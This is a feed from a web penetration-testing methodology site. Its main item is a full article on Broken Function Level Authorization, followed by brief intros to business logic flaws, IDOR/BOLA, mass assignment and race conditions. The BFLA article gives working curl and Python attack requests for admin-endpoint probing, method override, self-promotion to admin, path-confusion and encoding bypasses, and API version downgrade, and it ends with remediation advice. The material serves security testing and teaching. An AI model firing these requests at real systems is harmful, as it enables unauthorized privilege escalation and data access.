Authorization on MrAzoth https://az0th.it/web/authz/ Recent content in Authorization on MrAzoth Hugo -- 0.154.5 en-us Tue, 24 Feb 2026 00:00:00 +0000 Broken Function Level Authorization (BFLA) https://az0th.it/web/authz/051-authz-bfla/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/authz/051-authz-bfla/ <h1 id="broken-function-level-authorization-bfla">Broken Function Level Authorization (BFLA)</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-285, CWE-269 <strong>OWASP API Top 10</strong>: API5:2023 – Broken Function Level Authorization</p> </blockquote> <hr> <h2 id="what-is-bfla">What Is BFLA?</h2> <p>BFLA (Broken Function Level Authorization) occurs when users can access <strong>functions/endpoints they shouldn&rsquo;t</strong> based on their role — e.g., a regular user calling admin APIs. Unlike BOLA (accessing another object), BFLA is about accessing <strong>privileged operations</strong>.</p> <pre tabindex="0"><code>Regular user token → GET /api/users/me → 200 OK (correct) Regular user token → GET /api/admin/users → should be 403 → but returns 200 with all users → BFLA Or: Regular user → DELETE /api/users/1337 → should be 403 → returns 204 No Content → BFLA </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Map all endpoints from JS, Swagger/OpenAPI, API docs, traffic</li> <li><input disabled="" type="checkbox"> Identify admin/privileged endpoints: <code>/admin</code>, <code>/internal</code>, <code>/manage</code>, <code>/staff</code></li> <li><input disabled="" type="checkbox"> Test all &ldquo;restricted&rdquo; endpoints with low-privilege token</li> <li><input disabled="" type="checkbox"> Test all HTTP methods on every endpoint (GET→POST→PUT→PATCH→DELETE)</li> <li><input disabled="" type="checkbox"> Test API version downgrade (v2 protected, v1 not)</li> <li><input disabled="" type="checkbox"> Test HTTP method override headers</li> <li><input disabled="" type="checkbox"> Test path confusion (capitalization, trailing slash, double slash)</li> <li><input disabled="" type="checkbox"> Test direct object manipulation to trigger privileged operations</li> <li><input disabled="" type="checkbox"> Compare responses: authenticated admin vs authenticated user</li> <li><input disabled="" type="checkbox"> Test GraphQL mutations with user token (see 83_GraphQL_Full.md)</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--admin-endpoint-access">Attack 1 — Admin Endpoint Access</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Test admin paths with regular user token:</span> </span></span><span style="display:flex;"><span>ENDPOINTS<span style="color:#f92672">=(</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/admin/users&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/admin/settings&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/api/admin/dashboard&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/api/v1/admin/users&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/management/users&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/internal/config&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/staff/reports&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/superadmin&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/api/users?role=admin&#34;</span> <span style="color:#75715e"># role filter</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/api/audit-log&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;/api/system/health/debug&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> path in <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ENDPOINTS[@]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> status<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /dev/null -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;https://target.com</span>$path<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer REGULAR_USER_TOKEN&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;</span>$path<span style="color:#e6db74">: </span>$status<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span></code></pre></div><h3 id="attack-2--http-method-exploitation">Attack 2 — HTTP Method Exploitation</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Server only protects specific methods:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># GET /api/users/1 → 403 (protected read)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># DELETE /api/users/1 → 204 (DELETE not protected)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># PUT /api/users/1 + body → 200 (PUT not checked)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> method in GET POST PUT PATCH DELETE HEAD OPTIONS TRACE; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> result<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /tmp/resp -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -X <span style="color:#e6db74">&#34;</span>$method<span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;https://api.target.com/v1/admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;role&#34;:&#34;admin&#34;}&#39;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;</span>$method<span style="color:#e6db74">: </span>$result<span style="color:#e6db74"> </span><span style="color:#66d9ef">$(</span>cat /tmp/resp | head -c 100<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># HTTP method override (when firewall only allows GET/POST):</span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/users/1&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;X-HTTP-Method-Override: DELETE&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/users/1&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;X-Method-Override: PUT&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;role&#34;: &#34;admin&#34;}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># _method parameter (Rails/Laravel):</span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/users/1?_method=DELETE&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> </span></span></code></pre></div><h3 id="attack-3--privilege-escalation-via-function">Attack 3 — Privilege Escalation via Function</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Escalate own privileges:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Find: update user role function</span> </span></span><span style="display:flex;"><span>curl -X PUT <span style="color:#e6db74">&#34;https://api.target.com/v1/users/MY_ID&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer MY_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;role&#34;: &#34;admin&#34;, &#34;permissions&#34;: [&#34;*&#34;]}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Create admin user (registration without role check):</span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;email&#34;:&#34;attacker@evil.com&#34;,&#34;password&#34;:&#34;pass&#34;,&#34;role&#34;:&#34;admin&#34;,&#34;isAdmin&#34;:true}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Promote self via admin endpoint:</span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/admin/users/MY_ID/promote&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Assign group/team with admin privileges:</span> </span></span><span style="display:flex;"><span>curl -X POST <span style="color:#e6db74">&#34;https://api.target.com/v1/teams/ADMIN_TEAM/members&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;user_id&#34;: &#34;MY_ID&#34;}&#39;</span> </span></span></code></pre></div><h3 id="attack-4--path-confusion-bypass">Attack 4 — Path Confusion Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Uppercase bypass (if authorization check is case-sensitive):</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/Admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/ADMIN/users&#34;</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/aDmIn/users&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Trailing slash / double slash:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/admin/users/&#34;</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com//admin/users&#34;</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/api//admin/users&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Path traversal to reach admin:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/api/users/../admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/api/v1/users/../../admin/users&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># URL encoding:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/%61dmin/users&#34;</span> <span style="color:#75715e"># a → %61</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/adm%69n/users&#34;</span> <span style="color:#75715e"># i → %69</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/%2fadmin%2fusers&#34;</span> <span style="color:#75715e"># encoded slashes</span> </span></span></code></pre></div><h3 id="attack-5--api-version-downgrade">Attack 5 — API Version Downgrade</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># v2 is protected but v1 is legacy and unprotected:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/v2/admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#75715e"># → 403</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/v1/admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#75715e"># → 200?</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test multiple version formats:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> v in v1 v2 v3 v0 beta alpha <span style="color:#ae81ff">1</span> <span style="color:#ae81ff">2</span> 3; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> status<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /dev/null -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;https://api.target.com/</span>$v<span style="color:#e6db74">/admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;/</span>$v<span style="color:#e6db74">/: </span>$status<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Accept-Version header:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/admin/users&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Accept-Version: v1&#34;</span> </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># AuthMatrix (Burp extension):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Define roles, assign tokens, map endpoints</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Auto-test all combinations → shows unauthorized access</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Autorize (Burp extension):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Replay every request with lower-privilege token</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Highlights responses that match → potential BFLA</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># ffuf for endpoint discovery:</span> </span></span><span style="display:flex;"><span>ffuf -u <span style="color:#e6db74">&#34;https://target.com/FUZZ&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -w /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -mc 200,201,204 -o results.json </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Param Miner (Burp):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Discover hidden parameters that control function access</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Manual script — test all methods × all endpoints:</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">import requests, itertools </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">token = &#39;USER_TOKEN&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">endpoints = [&#39;/admin/users&#39;, &#39;/admin/settings&#39;, &#39;/api/export&#39;] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">methods = [&#39;GET&#39;, &#39;POST&#39;, &#39;PUT&#39;, &#39;PATCH&#39;, &#39;DELETE&#39;] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">headers = {&#39;Authorization&#39;: f&#39;Bearer {token}&#39;, &#39;Content-Type&#39;: &#39;application/json&#39;} </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">for ep, m in itertools.product(endpoints, methods): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> r = requests.request(m, f&#39;https://target.com{ep}&#39;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> headers=headers, json={}, timeout=5) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> if r.status_code not in (403, 405): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> print(f&#39;[!] {m} {ep} → {r.status_code}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Centralized authorization layer</strong>: all function-level access decisions in one place (middleware/policy engine)</li> <li><strong>Default deny</strong>: every function access denied unless explicitly granted to role</li> <li><strong>Role-based access control (RBAC)</strong>: define roles with explicit function permissions, check on every call</li> <li><strong>Do not rely on UI hiding</strong>: removing admin buttons from UI is not access control — enforce at API level</li> <li><strong>Audit all HTTP methods</strong> per endpoint — not just GET/POST</li> <li><strong>API version retirement</strong>: decommission old API versions; redirect with <code>410 Gone</code> and enforce same auth controls until removal</li> <li><strong>Regular access control audits</strong>: use automated tools like AuthMatrix in CI/CD pipeline</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> Business Logic Flaws https://az0th.it/web/authz/054-authz-business-logic/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/authz/054-authz-business-logic/ <h1 id="business-logic-flaws">Business Logic Flaws</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-840, CWE-841 <strong>OWASP</strong>: A04:2021 – Insecure Design</p> </blockquote> <hr> <h2 id="what-are-business-logic-flaws">What Are Business Logic Flaws?</h2> <p>Business logic flaws are vulnerabilities in the application&rsquo;s intended workflow — not in code syntax or data handling, but in the rules governing what users can do, in what order, and under what conditions. They are rarely detected by scanners because they require understanding of how the application <em>should</em> work to recognize when it doesn&rsquo;t.</p> IDOR / BOLA: Insecure Direct Object Reference https://az0th.it/web/authz/050-authz-idor/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/authz/050-authz-idor/ <h1 id="idor--bola-insecure-direct-object-reference">IDOR / BOLA: Insecure Direct Object Reference</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-639 <strong>OWASP</strong>: A01:2021 – Broken Access Control <strong>API Security</strong>: OWASP API Top 10 — API1:2023 BOLA</p> </blockquote> <hr> <h2 id="what-is-idor--bola">What Is IDOR / BOLA?</h2> <p><strong>IDOR</strong> (Insecure Direct Object Reference) occurs when an application uses a user-controllable identifier (ID, filename, hash) to access a resource without verifying that the requesting user is authorized to access it.</p> <p><strong>BOLA</strong> (Broken Object Level Authorization) is the API-centric term — same concept, different vocabulary. It is the #1 API vulnerability class.</p> Mass Assignment https://az0th.it/web/authz/052-authz-mass-assignment/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/authz/052-authz-mass-assignment/ <h1 id="mass-assignment">Mass Assignment</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-915 <strong>OWASP</strong>: A03:2021 – Injection | A01:2021 – Broken Access Control</p> </blockquote> <hr> <h2 id="what-is-mass-assignment">What Is Mass Assignment?</h2> <p>Mass assignment (also called auto-binding or object injection) occurs when a framework automatically binds HTTP request parameters to model/object properties without an allowlist. If an application exposes a <code>User</code> model and the attacker adds <code>role=admin</code> or <code>isAdmin=true</code> to the request, the ORM may silently set those fields.</p> <p>The vulnerability is architectural — it exists in the gap between what the API <strong>intends</strong> to accept and what it <strong>actually</strong> binds.</p> Race Conditions https://az0th.it/web/authz/053-authz-race-conditions/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/authz/053-authz-race-conditions/ <h1 id="race-conditions">Race Conditions</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-362 <strong>OWASP</strong>: A04:2021 – Insecure Design</p> </blockquote> <hr> <h2 id="what-are-race-conditions">What Are Race Conditions?</h2> <p>Race conditions in web apps occur when <strong>multiple concurrent requests</strong> interact with shared state before that state is properly updated. The classic pattern: read-check-act without atomicity.</p> <pre tabindex="0"><code>Thread A: READ balance=100 → CHECK balance&gt;50? YES → [gap] → WRITE balance=50 Thread B: READ balance=100 → CHECK balance&gt;100? YES → WRITE balance=0 → Both succeed, but total withdrawn = 150 from 100 balance (TOCTOU) </code></pre><p><strong>Modern web race conditions</strong> (PortSwigger research):</p>